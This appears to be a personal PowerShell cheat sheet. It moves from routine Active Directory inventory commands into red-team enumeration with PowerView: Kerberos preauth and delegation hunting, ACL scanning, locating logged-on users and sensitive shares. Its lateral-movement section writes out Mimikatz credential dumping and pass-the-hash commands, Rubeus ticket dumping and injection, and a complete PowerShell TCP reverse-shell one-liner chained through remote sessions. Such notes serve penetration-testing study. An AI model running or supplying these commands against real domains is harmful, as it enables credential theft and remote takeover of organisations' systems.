Show-DomainTree -Verbose
Get-ADDomain | Format-Table -Property DNS*, PDC*, *master, Replica*
Get-ADDomain google.com | format-table PDCEmulator,RIDMaster,InfrastructureMaster
$SearchBase = $DomainInfo.DistinguishedName
Add-Content -Path $LogFile -Value "Domain FQDN: $($DomainInfo.DNSRoot)"
Add-Content -Path $LogFile -Value "Domain NetBIOS: $($DomainInfo.NetBIOSName)"
Add-Content -Path $LogFile -Value "Script Reference: $($ScriptText[0].Content)"
Add-Content -Path $LogFile -Value "----------------------------------------------------"
If ($DomainInfo.DomainSID.GetType().Name -eq 'String'){
    $DomainSID = $DomainInfo.DomainSID
} Else {
    $DomainSID = ($DomainInfo | Select-Object -ExpandProperty DomainSID).Value
}
$ChildDomainStatus = foreach ($child in $DomainInfo.ChildDomains){
    If ((Test-Netconnection $child -Port 389).TcpTestSucceeded){
        New-Object -TypeName PSObject -Property @{
            DomainName = $child
            Online = $True
        }
    } Else {
        New-Object -TypeName PSObject -Property @{
            DomainName = $child
            Online = $False
        }
    }
}
# Domain Controllers
Get-ADDomainController -Filter * | Export-Csv ad-domain-controller-list_active-directory-details_2022-05-25.csv -NoTypeInformation -Encoding utf8
# Domain Controllers - Read-Only
$DCs = Get-ADDomainController -Filter {ISReadOnly -eq $True} -ErrorVariable ErrVar -ErrorAction SilentlyContinue | Select-Object $Properties
Get-ADDomainController -Discover -Service PrimaryDC
Get-ADObject -LDAPFilter "(objectclass=computer)" -searchbase "ou=domain controllers,dc=google,dc=com"
# ADBranch
Get-ADBranch -SearchBase "dc=<COMPANY-NAME>,dc=com" | Format-List -Property Name
Get-ADBranch -SearchBase "dc=<COMPANY-NAME>,dc=com" | Export-Csv ad-branch-list_active-directory-details_2022-05-25.csv -NoTypeInformation -Encoding utf8
# ADGroup
# Get all groups that contain the word "admin" in the group name
Get-ADGroup -Filter 'Name -like "*admin*"' | select Name
Get-ADGroup -Filter * -Property * | Export-Csv ad-group-list_active-directory-details_2022-05-25.csv -NoTypeInformation -Encoding utf8
Get-ADGroupReport -Scope Any -Verbose | Export-Csv .\output_get-adgroupreport_2022-05-26.csv -NoTypeInformation -Encoding utf8
Get-ADGroup -Filter { Name -like "*admin*" }
Get-ADGroup -Filter { Name -like "*Management*" }
# ADGroupMember
# Get all members of the "Domain Admins" group
get-adgroupmember "Domain Admins" -recursive -Verbose | Export-Csv .\output_get-adgroupmember_2022-05-26.csv -NoTypeInformation -Encoding utf8
# Display Group Members of the HR Team Group
Get-ADGroupMember -Identity 'HR Team' | Format-Table -Property SamAccountName, DistinguishedName
# ADGroupMemberObjects
Get-ADGroupMemberObjects -GroupNTAccount 'Google\Admin Staff' -Verbose | ForEach-Object {Get-ADUser $_.NTAccount.Split("\")[1] -Property * -Verbose} | Export-Csv .\output_get-adgroupmemberobjects_2022-05-26.csv -NoTypeInformation -Encoding utf8
# ADPrincipalGroupMembership
# Get group membership for "user01"
Get-ADPrincipalGroupMembership -Identity user01 
# ADUser
# "Get-ADUser"
# Get all ADUsers
Get-ADUser -Filter * -Property * | Export-Csv ad-user-list_active-directory-details_2022-05-25.csv -NoTypeInformation -Encoding utf8
# Find user accounts used as Service accounts
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
# Search for domain computers with unconstrained delegation enabled
Get-ADComputer -Filter {TrustedForDelegation -eq $True}
Get-ADUser -Filter {TrustedForDelegation -eq $True}
# Enumerating accounts with Kerberos Preauth disabled
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth
# Check if user01 already has a SPN
Get-ADUser -Identity User01 -Properties serviceprincipalname | select serviceprincipalname
# Get ADUser by Name
Get-ADUser -Filter 'Name -like "*John*Smith*"' -Properties * | Format-List -Property *
Get-ADUser -Identity student1 -Properties *
# Search for a particular string in a user's attributes
Find-UserField -SearchField Description -SearchTerm "built"
Get-ADUser -Filter 'Description -like "*built*"' -Properties Description | select name,Description
# Get list of all properties for users in the current domain
Get-UserProperty
Get-UserProperty -Properties pwdlastset
Get-ADUser -Filter * -Properties * | select -First 1 | Get-Member -MemberType *Property | select Name
Get-ADUser -Filter * -Properties * | select name,@{expression={[datetime]::fromFileTime($_.pwdlastset)}}
# ADObject
Get-ADObject -Filter * -Verbose | Export-Csv .\ADObjects.csv -NoTypeInformation -Encoding utf8
# Returns all printers in the current (or specified) domain.
Get-ADObject -LDAPFilter '(objectCategory=printQueue)' -Properties driverName,driverVersion,Name,portName,printShareName,serverName,url,whenChanged,whenCreated -Verbose | Export-Csv .\output_get-adobject_ldapfilter_find-printers_2022-05-26.csv -NoTypeInformation -Encoding utf8
Get-ADObject -LDAPFilter "(ObjectClass=GroupPolicyContainer)" -Property * -Verbose | Export-Csv .\output_get-adobject_ldapfilter_objectclass_grouppolicycontainer_2022-05-26.csv -NoTypeInformation -Encoding utf8
# Identify objects in the Active Directory (AD) Recycle Bin
# Active Directory Recycle Bin (since Windows Server 2008 R2 OS, for recovering deleted objects)
Get-ADObject -IncludeDeletedObjects -LdapFilter "(&(objectClass=user))"
Get-ADObject -IncludeDeletedObjects -LdapFilter "(&(objectClass=user))" | select Name
# Enumeration users and computers with constrained delegation enabled
Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo
# ADComputer
Get-ADComputer -Filter * -Property * | Export-Csv ad-computer-list_active-directory-details_2022-05-25.csv -NoTypeInformation -Encoding utf8
Get-ADComputerReport -Verbose *>&1 | Tee-Object -FilePath "output_Get-ADComputerReport_command_2022-04-25.txt"
# Search for domain computers with unconstrained delegation enabled
Get-ADComputer -Filter {TrustedForDelegation -eq $True}
Get-ADUser -Filter {TrustedForDelegation -eq $True}
# "CimSession" and "CimInstance"
[PowerShell]::Create().AddCommand("Get-CimInstance").AddArgument("Win32_BIOS").Invoke()
Get-CimInstance -CimSession "localhost" -ClassName Win32_ComputerSystem -Property *
# Network Info
Get-CimInstance -ComputerName "localhost" -ClassName Win32_NetworkAdapterConfiguration -Filter "IPEnabled = 'True'" | Select-Object -Property *
# Network Info - "IPAddress" only
(Get-CimInstance -ComputerName "localhost" -ClassName Win32_NetworkAdapterConfiguration -Filter "IPEnabled = 'True'" | Select-Object -Property *).IPAddress[0]
# "logicaldisk" - Space
[Math]::Round(((Get-CimInstance win32_logicaldisk -Filter "name = 'c:'").FreeSpace / 1GB),1)
# Retrieve process information from remote system (with WMI remoting enabled)
Get-CimInstance -CimSession "localhost" -ClassName win32_process
# Retrieve service names and statuses
$session = New-CimSession -ComputerName "localhost"
$session = New-CimSession -Credential <USERNAME>\<PASSWORD> -ComputerName "localhost"
Get-CimInstance -CimSession $session -ClassName win32_service -Property name, state | sort state | ft name, state -AutoSize -HideTableHeaders -Wrap
# Retrieve BIOS information
Invoke-Command -ComputerName "localhost" -ScriptBlock {Get-CimInstance win32_bios}
# "PSSession"
$PSSession = New-PSSession -ComputerName "localhost"
$PSSession = New-PSSession -Credential <USERNAME>\<PASSWORD> -ComputerName "localhost"
Invoke-Command -Session $PSSession -ScriptBlock {gwmi win32_bios} -AsJob
# AD - Recycle Bin 
# Identify objects in the Active Directory (AD) Recycle Bin
# Active Directory Recycle Bin (since Windows Server 2008 R2 OS, for recovering deleted objects)
Get-ADObject -IncludeDeletedObjects -LdapFilter "(&(objectClass=user))"
Get-ADObject -IncludeDeletedObjects -LdapFilter "(&(objectClass=user))" | select Name

Computer Info

$servers = Get-ADComputer -Filter * -Properties *
# "Get-ADComputer" (with limited property value output)
Get-ADComputer -Filter * -Property 'Name','DistinguishedName','OperatingSystem','OperatingSystemServicePack','OperatingSystemVersion','IPv4Address','whenCreated','whenChanged','PasswordLastSet','userAccountControl' -ErrorVariable ErrVar -ErrorAction SilentlyContinue | Export-Csv -path OutFile.CSV -NoTypeInformation -Encoding utf8
# "Get-ADComputer" (with limited property value output, alternative)
Get-ADComputer -Filter * -Property Name,DNSHostName,Enabled,isCriticalSystemObject,ManagedBy,DisplayName,DistinguishedName,CanonicalName,ObjectCategory,ObjectClass,ObjectSID,OperatingSystem,OperatingSystemServicePack,OperatingSystemVersion,IPv4Address,Description,DisplayName,whenCreated,whenChanged,PasswordLastSet,userAccountControl,MemberOf,PrimaryGroup,adminCount -ErrorVariable ErrVar -ErrorAction SilentlyContinue | Export-Csv -Path OutFile.CSV -NoTypeInformation -Encoding utf8
# Alternative Way
Get-ADObject -LDAPFilter "(objectclass=computer)" -searchbase "dc=google,dc=com" -Verbose -Property * | Export-Csv -Path .\report_get-adobject_of-type-computer_from_google-com-domain_all-computers.csv -Encoding utf8
Get-ADComputer -Identity "<HOSTNAME>" -Properties * -Verbose
Get-ComputerInfo -Property "*version"
Write-Host $env:COMPUTERNAME
Get-CimClass -ClassName *bios*
Get-CimClass -ClassName Win32_Bios
Get-CimInstance -ClassName Win32_Bios
Get-CimInstance -ClassName Win32_OperatingSystem
Get-CimInstance -ClassName Win32_NetworkAdapterConfiguration -Filter "DHCPEnabled = $true"
Get-CimInstance -Query "SELECT * FROM Win32_NetworkAdapterConfiguration WHERE DHCPEnabled = $true"
Get-CimInstance -ClassName Win32_Environment
Get-Help * -Parameter ComputerName
Get-Command -ParameterName ComputerName
Get-ChildItem hklm:\software | Get-Member ps*
Get-Process | sort -Descending ws | select -First 3
Get-Process | where Handles -gt 1000
# Output process with process ID = "7884"
Get-Process | Where-Object {$_.id -eq "7884"} 

User Accounts

Get-WmiObject -Class Win32_UserAccount -Namespace "root\cimv2" -Filter "LocalAccount='$True'"

Registry

cd hklm:\software\microsoft\powershell
Get-ChildItem -Path Registry::
Get-ChildItem -Path registry::HKEY_CURRENT_CONFIG\System\CurrentControlSet\SERVICES\TSDDD\

Files

# Get folder size (in GB)
'{0:N2} GB' -f ((Get-ChildItem -Path ".\temp_folder" -Recurse -ErrorAction SilentlyContinue | measure Length -sum).sum / 1Gb)
# Get all Windows system files (".sys" files)
Get-ChildItem -Path C:\ -Filter *.sys -Force
# Search for "ADComputer" text in files recursively
Get-ChildItem -path "C:\Exclusions\github-projects" -Recurse -include "*" | Select-String -Pattern "ADComputer" | select filename, linenumber, line, path | Tee-Object -FilePath output_tee_training-folder.txt
# Unblock files (to allow script files to be ran in PowerShell terminal)
Get-ChildItem -Recurse | Unblock-File
# Output files which are modified within the last 30 days
gci .\ | where{$_.LastWriteTime -ge (Get-Date).AddDays(-30)}

netstat

netstat -n | select -Skip 4 | ConvertFrom-String -PropertyNames Blank, Protocol, LocalAddress, ForeignAddress, State | Select-Object Protocol, LocalAddress, ForeignAddress, State

clipboard

Get-Clipboard

Processes

Invoke-CimMethod -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine = 'calc.exe'}
Get-CimInstance -ClassName Win32_Process -Filter "Name='calculator.exe'"

Cimsession

Get-Command -ParameterName Cimsession

Services

Get-Service -Name BITS

GitHub - Commands

Install-Module psgithub -Force -Verbose
Import-Module psgithub -Force -Verbose
Get-Command -Module psgithub
Find-GitHubRepository -Query "*powersploit*" | Export-Csv .\output_find-githubrepository_powersploit_2022-05-26.csv -NoTypeInformation -Encoding utf8

Recon

POWERSHELL SCAN

TODO - Add Notes

PORT SCAN

Import-Module Invoke-Portscan.ps1
<#
Invoke-Portscan -Hosts "websrv.domain.local,wsus.domain.local,apps.domain.local" -TopPorts 50
echo websrv.domain.local | Invoke-Portscan -oG test.gnmap -f -ports "80,443,8080"
Invoke-Portscan -Hosts 172.16.0.0/24 -T 4 -TopPorts 25 -oA localnet
#>

AD MODULE WITHOUT RSAT

The secret to being able to run AD enumeration commands from the AD Powershell module on a system without RSAT installed, is the DLL located in C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.ActiveDirectory.Management on a system that has the RSAT installed. Set up your AD VM, install RSAT, extract the dll and drop it to the target system used to enumerate the active directory.

Import-Module .\Microsoft.ActiveDirectory.Management.dll
Get-Command get-adcom*

GENERAL FUNCTIONS OF POWERVIEW

Misc Functions:
Export-PowerViewCSV             #  thread-safe CSV append
Set-MacAttribute                #  Sets MAC attributes for a file based on another file or input (from Powersploit)
Copy-ClonedFile                 #  copies a local file to a remote location, matching MAC properties
Get-IPAddress                   #  resolves a hostname to an IP
Test-Server                     #  tests connectivity to a specified server
Convert-NameToSid               #  converts a given user/group name to a security identifier (SID)
Convert-SidToName               #  converts a security identifier (SID) to a group/user name
Convert-NT4toCanonical          #  converts a user/group NT4 name (i.e. dev/john) to canonical format
Get-Proxy                       #  enumerates local proxy settings
Get-PathAcl                     #  get the ACLs for a local/remote file path with optional group recursion
Get-UserProperty                #  returns all properties specified for users, or a set of user:prop names
Get-ComputerProperty            #  returns all properties specified for computers, or a set of computer:prop names
Find-InterestingFile            #  search a local or remote path for files with specific terms in the name
Invoke-CheckLocalAdminAccess    #  check if the current user context has local administrator access to a specified host
Get-DomainSearcher              #  builds a proper ADSI searcher object for a given domain
Get-ObjectAcl                   #  returns the ACLs associated with a specific active directory object
Add-ObjectAcl                   #  adds an ACL to a specified active directory object
Get-LastLoggedOn                #  return the last logged on user for a target host
Get-CachedRDPConnection         #  queries all saved RDP connection entries on a target host
Invoke-ACLScanner               #  enumerate -1000+ modifable ACLs on a specified domain
Get-GUIDMap                     #  returns a hash table of current GUIDs -> display names
Get-DomainSID                   #  return the SID for the specified domain
Invoke-ThreadedFunction         #  helper that wraps threaded invocation for other functions
net * Functions:
Get-NetDomain                   #  gets the name of the current user's domain
Get-NetForest                   #  gets the forest associated with the current user's domain
Get-NetForestDomain             #  gets all domains for the current forest
Get-NetDomainController         #  gets the domain controllers for the current computer's domain
Get-NetUser                     #  returns all user objects, or the user specified (wildcard specifiable)
Add-NetUser                     #  adds a local or domain user
Get-NetComputer                 #  gets a list of all current servers in the domain
Get-NetPrinter                  #  gets an array of all current computers objects in a domain
Get-NetOU                       #  gets data for domain organization units
Get-NetSite                     #  gets current sites in a domain
Get-NetSubnet                   #  gets registered subnets for a domain
Get-NetGroup                    #  gets a list of all current groups in a domain
Get-NetGroupMember              #  gets a list of all current users in a specified domain group
Get-NetLocalGroup               #  gets the members of a localgroup on a remote host or hosts
Add-NetGroupUser                #  adds a local or domain user to a local or domain group
Get-NetFileServer               #  get a list of file servers used by current domain users
Get-DFSshare                    #  gets a list of all distribute file system shares on a domain
Get-NetShare                    #  gets share information for a specified server
Get-NetLoggedon                 #  gets users actively logged onto a specified server
Get-NetSession                  #  gets active sessions on a specified server
Get-NetRDPSession               #  gets active RDP sessions for a specified server (like qwinsta)
Get-NetProcess                  #  gets the remote processes and owners on a remote server
Get-UserEvent                   #  returns logon or TGT events from the event log for a specified host
Get-ADObject                    #  takes a domain SID and returns the user, group, or computer object associated with it
Set-ADObject                    #  takes a SID, name, or SamAccountName to query for a specified  domain object, and then sets a pecified 'PropertyName' to a specified 'PropertyValue'
GPO functions:
Get-GptTmpl                     #  parses a GptTmpl.inf to a custom object
Get-NetGPO                      #  gets all current GPOs for a given domain
Get-NetGPOGroup                 #  gets all GPOs in a domain that set "Restricted Groups" on on target machines
Find-GPOLocation                #  takes a user/group and makes machines they have effectiverights over through GPO enumeration and correlation
Find-GPOComputerAdmin           #  takes a computer and determines who has admin rights over itthrough GPO enumeration
Get-DomainPolicy                #  returns the default domain or DC policy
Get-GPOReport -All -ReportType Html -Path ".\All-GPOs.html" -Verbose
User-Hunting Functions:
Invoke-UserHunter               #  finds machines on the local domain where specified users are logged into, and can optionally check if the current user has local admin access to found machines
Invoke-StealthUserHunter        #  finds all file servers utilizes in user HomeDirectories, and checks the sessions one each file server, hunting for particular users
Invoke-ProcessHunter            #  hunts for processes with a specific name or owned by a specific user on domain machines
Invoke-UserEventHunter          #  hunts for user logon events in domain controller event logs
Domain Trust Functions:
Get-NetDomainTrust              #  gets all trusts for the current user's domain
Get-NetForestTrust              #  gets all trusts for the forest associated with the current user's domain
Find-ForeignUser                #  enumerates users who are in groups outside of their principal domain
Find-ForeignGroup               #  enumerates all the members of a domain's groups and finds users that are outside of the queried domain
Invoke-MapDomainTrust           #  try to build a relational mapping of all domain trusts
MetaFunctions:
Invoke-ShareFinder              #  finds (non-standard) shares on hosts in the local domain
Invoke-FileFinder               #  finds potentially sensitive files on hosts in the local domain
Find-LocalAdminAccess           #  finds machines on the domain that the current user has local admin access to
Find-ManagedSecurityGroups      #  searches for active directory security groups which are managed and identify users who have write access to
                                #  those groups (i.e. the ability to add or remove members)
Find-UserField                  #  searches a user field for a particular term
Find-ComputerField              #  searches a computer field for a particular term
Get-ExploitableSystem           #  finds systems likely vulnerable to common exploits
Invoke-EnumerateLocalAdmin      #  enumerates members of the local Administrators groups across all machines in the domain

Domain Enumeration

Domain

  • Get current domain
Get-NetDomain (PowerView)
Get-ADDomain (ActiveDirectory Module)
  • Get object of another domain
Get-NetDomain -Domain domain.local
Get-ADDomain -Identity domain.local
  • Get domain SID for the current domain
Get-DomainSID
(Get-ADDomain).DomainSID
  • Get domain policy for the current domain
Get-DomainPolicy
(Get-DomainPolicy)."system access"
  • Get domain policy for another domain
(Get-DomainPolicy -domain domain.local)."system access"
  • Get domain controllers for the current domain
Get-NetDomainController
Get-ADDomainController
  • Get domain controllers for another domain
Get-NetDomainController -Domain domain.local
Get-ADDomainController -DomainName domain.local -Discover

NETUSER

  • Get a list of users in the current domain
Get-NetUser
Get-NetUser -Username student1
Get-NetUser | select -ExpandProperty samaccountname
Get-ADUser -Filter * -Properties *
Get-ADUser -Identity student1 -Properties *
  • Get list of all properties for users in the current domain
Get-UserProperty
Get-UserProperty -Properties pwdlastset
Get-ADUser -Filter * -Properties * | select -First 1 | Get-Member -MemberType *Property | select Name
Get-ADUser -Filter * -Properties * | select name,@{expression={[datetime]::fromFileTime($_.pwdlastset)}}
  • Search for a particular string in a user's attributes
Find-UserField -SearchField Description -SearchTerm "built"
Get-ADUser -Filter 'Description -like "*built*"' -Properties Description | select name,Description

NETGROUP

  • Get a list of computers in the current domain
Get-NetComputer
Get-NetComputer -OperatingSystem "*Server 2016*"
Get-NetComputer -Ping
Get-NetComputer -FullData
Get-ADComputer -Filter * | select Name Get-ADComputer -Filter 'OperatingSystem -like "*Server 2016*"' -Properties OperatingSystem | select Name,OperatingSystem
Get-ADComputer -Filter * -Properties DNSHostName | %{Test-Connection -Count 1 -ComputerName $_.DNSHostName}
Get-ADComputer -Filter * -Properties *
  • Get all the groups in the current domain
Get-NetGroup
Get-NetGroup -Domain <targetdomain>
Get-NetGroup -FullData
Get-ADGroup -Filter * | select Name
Get-ADGroup -Filter * -Properties *
  • Get all groups containing the word "admin" in group name
Get-NetGroup *admin*
Get-ADGroup -Filter 'Name -like "*admin*"' | select Name
  • Get all the members of the Domain Admins group
Get-NetGroupMember -GroupName "Domain Admins" -Recurse
Get-ADGroupMember -Identity "Domain Admins" -Recursive
Get-NetGroupMember -GroupName "Enterprise Admins" -Domain target.local
  • Get the group membership for a user
Get-NetGroup -UserName "john"
Get-ADPrincipalGroupMembership -Identity student1
  • List all the local groups on a machine (needs administrator privs on non-dc machines)
Get-NetLocalGroup -ComputerName DC01.enumme.local -ListGroups
  • Get members of all the local groups on a machine (needs administrator privs on non-dc machines)
Get-NetLocalGroup -ComputerName DC01.enumme.local -Recurse

Logged

  • Get actively logged users on a computer (needs local admin rights on the target)
Get-NetLoggedon -ComputerName <servername>
  • Get locally logged users on a computer (needs remote registry on the target - started by-default on server OS)
Get-LoggedonLocal -ComputerName DC01.enumme.local
  • Get the last logged user on a computer (needs administrative rights and remote registry on the target)
Get-LastLoggedOn -ComputerName <servername>

Share

  • Find shares on hosts in current domain
Invoke-ShareFinder -Verbose
Invoke-ShareFinder -ExcludeStandard -ExcludePrint -ExcludeIPC -Verbose
  • Find sensitive files on computers in the domain
Invoke-FileFinder -Verbose
  • Get all fileservers of the domain
Get-NetFileServer

GPO

# Get All GPO's
Get-GPO -All -Verbose | export-csv .\report_get-gpo_all_verbose.csv -Encoding utf8
Get-GPOReport -All -ReportType Html -Path ".\All-GPOs.html" -Verbose
  • Get list of GPO in current domain
Get-GPOReport -All -ReportType Html -Path ".\All-GPOs.html" -Verbose
Get-NetGPO
Get-NetGPO -ComputerName DC01.enumme.local
Get-GPO -All (GroupPolicy module)
Get-GPResultantSetOfPolicy -ReportType Html -Path C:\Users\Administrator\report.html (Provides RSoP)
  • Enumerate ACLs for all the GPOs
Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name}
  • Enumerate Restricted Groups from GPO
Get-NetGPOGroup -Verbose
  • Enumerate GPOs where target user or group have interesting permissions
Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name} | ?{$_.IdentityReference -match "target"}
  • Membership of the Group "RDPUsers”
Get-NetGroupMember -GroupName RDPUsers
  • Get GPO(s) which use Restricted Groups or groups.xml for interesting users
Get-NetGPOGroup
  • Get users which are in a local group of a machine using GPO
Find-GPOComputerAdmin -Computername srv.enumme.local
  • Get machines where the given user is member of a specific group
Find-GPOLocation -UserName john -Verbose
  • GPO applied on the target OU
(Get-NetOU targetmachine -FullData).gplink[LDAP://cn={x-x-x-x-x},cn=policies,cn=system,DC=target,DC=domain,DC=local;0]
Get-NetGPO -ADSpath 'LDAP://cn={x-x-x-x-x},cn=policies,cn=system,DC=target,DC=domain,DC=local'

OU

  • Get OUs in a domain
Get-NetOU -FullData
Get-ADOrganizationalUnit -Filter * -Properties *
  • Get GPO applied on an OU. Read GPOname from gplink attribute from Get-NetOU
Get-NetGPO -GPOname "{x-x-x-x-x}"
Get-GPO -Guid x-x-x-x-x (GroupPolicy module)
  • List all the computers in the target OU
Get-NetOU targetcomputer | %{Get-NetComputer -ADSPath $_}

ACL

  • Get the ACLs associated with the specified object
Get-ObjectAcl -SamAccountName john -ResolveGUIDs
Get-ObjectAcl -SamAccountName "users" -ResolveGUIDs -Verbose
Get-ObjectAcl -SamAccountName "Domain Admins" -ResolveGUIDs -Verbose
  • Get the ACLs associated with the specified prefix to be used for search
Get-ObjectAcl -ADSprefix 'CN=Administrator,CN=Users' -Verbose
  • We can also enumerate ACLs using ActiveDirectory module but without resolving GUIDs
(Get-Acl 'AD:\CN=Administrator,CN=Users,DC=domain,DC=local').Access
  • Get the ACLs associated with the specified LDAP path to be used for search
Get-ObjectAcl -ADSpath "LDAP://CN=Domain
Admins,CN=Users,DC=domain,DC=local" -ResolveGUIDs -Verbose
  • Search for interesting ACEs
Invoke-ACLScanner -ResolveGUIDs
Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentityReference -match "target"}
Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentityReference -match "targetgroup"}
  • Get the ACLs associated with the specified path
Get-PathAcl -Path "\\DC01.domain.local\sysvol"

Domain Trusts

  • Get a list of all domain trusts for the current domain
Get-NetDomainTrust
Get-NetForestDomain -Verbose
Get-NetDomainTrust -Domain fr.k71.test.local
Get-ADTrust
Get-ADTrust -Identity fr.k71.test.local
  • Get details about the current forest
Get-NetForest
Get-NetForest -Forest domain.local
Get-ADForest
Get-ADForest -Identity domain.local
  • Get all domains in the current forest
Get-NetForestDomain
Get-NetForestDomain -Forest domain.local
(Get-ADForest).Domains
  • Map all the trusts of the domain.local forest
Get-NetForestDomain -Verbose | Get-NetDomainTrust
  • Get all global catalogs for the current forest
Get-NetForestCatalog
Get-NetForestCatalog -Forest domain.local
Get-ADForest | select -ExpandProperty GlobalCatalogs
  • Map trusts of a forest
Get-NetForestTrust
Get-NetForestTrust -Forest domain.local
Get-ADTrust -Filter 'msDS-TrustForestTrustInfo -ne "$null"'
  • List external trusts
Get-NetForestDomain -Verbose | Get-NetDomainTrust | ?{$_.TrustType -eq 'External'}

if Bi-Directional trust we can extract information

Local Privilege Escalation

ADD COMMANDS!

Local Account Stealing

ADD COMMANDS!

Monitor Potential Incoming Account

ADD COMMANDS!

Admin Recon

ADD COMMANDS!

Lateral Movement

# PowerShell Remoting
- Execute commands or scriptblocks
Invoke-Command -Scriptblock {Get-Process} -ComputerName (Get-Content <list_of_servers>)
- Execute scripts from files
Invoke-Command -FilePath C:\scripts\Get-PassHashes.ps1 -ComputerName (Get-Content <list_of_servers>)
- Execute locally loaded function on the remote machines
Invoke-Command -ScriptBlock ${function:Get-PassHashes} -ComputerName (Get-Content <list_of_servers>)
Invoke-Command -ScriptBlock ${function:Get-PassHashes} -ComputerName (Get-Content <list_of_servers>) -ArgumentList
- A function call within the script is used
Invoke-Command -Filepath C:\path\Get-PassHashes.ps1 -ComputerName (Get-Content <list_of_servers>)
- "Stateful" commands using Invoke-Command
$Sess = New-PSSession -Computername Server1
Invoke-Command -Session $Sess -ScriptBlock {$Proc = Get-Process}
Invoke-Command -Session $Sess -ScriptBlock {$Proc.Name}
- Dump credentials on a local machine
Invoke-Mimikatz -DumpCreds
- Dump credentials on multiple remote machines
Invoke-Mimikatz -DumpCreds -ComputerName @("sys1","sys2")
- Over pass the hash
Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:lab.domain.local /ntlm:<ntlmhash> /run:powershell.exe"'
- Invoke Mimikatz to create a token from user
$sess = New-PSSession -ComputerName target.domain.local
Enter-PSSession $sess
# EP BYPASS + AMSI BYPASS
exit
# PUSH LOCAL SCRIPT TO SESSION
Invoke-Command -FilePath .\Invoke-Mimikatz.ps1 -Session $sess
Enter-PSSession $sess
# DUMPING
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'
### Forwarder
# RULE
netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=8080 connectaddress=10.10.10.10 connectport=8080
# CHECK
netsh interface portproxy show all
# RESET
netsh interface portproxy reset
### KERBEROS DOUBLE HOPS - Remote ticket dumping - SMB Lateral Hosting (skill)
- You are logged in to ServerA.
- From ServerA, you start a remote PowerShell session to connect to ServerB.
- A command you run on ServerB via your PowerShell Remoting session attempts to access a resource on ServerC.<br>
:no_entry: Access to the resource on ServerC is denied, because the credentials you used to create the PowerShell Remoting session are not passed from ServerB to ServerC.<br>
:no_entry: Cannot encapsulate multiple psremoting session.<br>
:no_entry: Delegation not available.<br>
# LOGIN WITH COMPROMISED ACCOUNT
Invoke-Mimikatz -Command '"sekurlsa::pth /user:bob /domain:DOMAIN.LOCAL /ntlm:00000000000000000000000000000000 /run:powershell.exe"'
# PSREMOTE TO SERVER A
$servera = New-PSSession -ComputerName SERVERA.DOMAIN.LOCAL
Enter-PSSession -Session $servera
# PASS CREDENTIAL TO SERVER B
$SecPassword = ConvertTo-SecureString 'password' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('DOMAIN\alice', $SecPassword)
$serverb = New-PSSession -ComputerName SERVERB.DOMAIN.LOCAL -Credential $Cred
# LIST TICKET IN SERVER C:
Invoke-Command -ScriptBlock { & '\\10.10.10.10\c$\Users\jack\desktop\Rubeus.exe' klist} -Session $serverb | Select-String -Pattern Username
# DUMP TICKET IN SERVER C:
Invoke-Command -ScriptBlock { & '\\10.10.10.10\c$\Users\jack\desktop\Rubeus.exe' dump /user:targetadmin} -Session $serverb
# INJECT TICKET IN SERVER B:
Invoke-Command -ScriptBlock {& '\\10.10.10.10\c$\Users\jack\desktop\Rubeus.exe'  ptt /ticket:B64 } -Session $serverb
# CHECK INJECTION:
Invoke-Command -ScriptBlock { ls \\serverc\c$ } -Session $serverb
# RCE ON SERVER C:
Invoke-Command -ScriptBlock {Invoke-Command -ScriptBlock {hostname} -ComputerName SERVERC.DOMAIN.LOCAL} -Session $serverb
# FINAL REVERSE SHELL IN SERVER A FROM SERVER C
Invoke-Command -ScriptBlock {Invoke-Command -ScriptBlock {$client = New-Object System.Net.Sockets.TCPClient("servera",8080);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()} -ComputerName SERVERC.DOMAIN.LOCAL} -Session $serverb 

Remote Administration

ADD COMMANDS!

Domain Admin Privileges

ADD COMMANDS!

Cross Trust Attacks

ADD COMMANDS!

Persistance and Exfiltrate

ADD COMMANDS!

API Wrapper

  • HipChatAdmin - A module for simple integration with Atlassian HipChat via the HipChat API.
  • PSGitHub - Module contains commands to manage GitHub through its REST API.
  • Posh-GitHub - Cmdlets that expose the GitHub API.
  • Posh-Gist - Cmdlets for interacting with GitHub Gist.
  • PSGist - A module to work with GitHub Gists.
  • PSAppVeyor - A module to interact with the AppVeyor REST API.
  • PSSlack - Module for simple Slack integration.
  • ConfluencePS - A module for interacting with Atlassian's Confluence in powershell (by using the API).
  • JiraPS - A module for interacting with Atlassian's Jira in powershell (by using the API).
  • PSTelegramAPI - Module for Telegram APIs
  • PSTeams - A module for sending formatted messages to a Microsoft Teams Channel.
  • PSURLScanio - A module for urlscan.io that is a service to scan and analyze websites.

Blogs


Books


Build Tools

  • psake - Build automation tool inspired by rake (aka make in Ruby) and bake (aka make in Boo).
  • Invoke-Build - Build and test automation tool inspired by psake.
  • PSDeploy - Module built for the purpose of simplifying multiple types of deployments.
  • BuildHelpers - Variety of helper functions for CI/CD scenarios.
  • YDeliver - Build and deployment framework aimed at .NET projects.

Code and Package Repositories

  • GitHub - Looking for an Open Source PowerShell project? It's probably here.
  • PowerShell Gallery - Official PowerShell package repository, used by PowerShellGet.
  • PowerShell Test Gallery - A test version of the PowerShell Gallery. Useful when developing new modules.

Commandline Productivity

  • posh-git - Set of PowerShell scripts which provide Git/PowerShell integration.
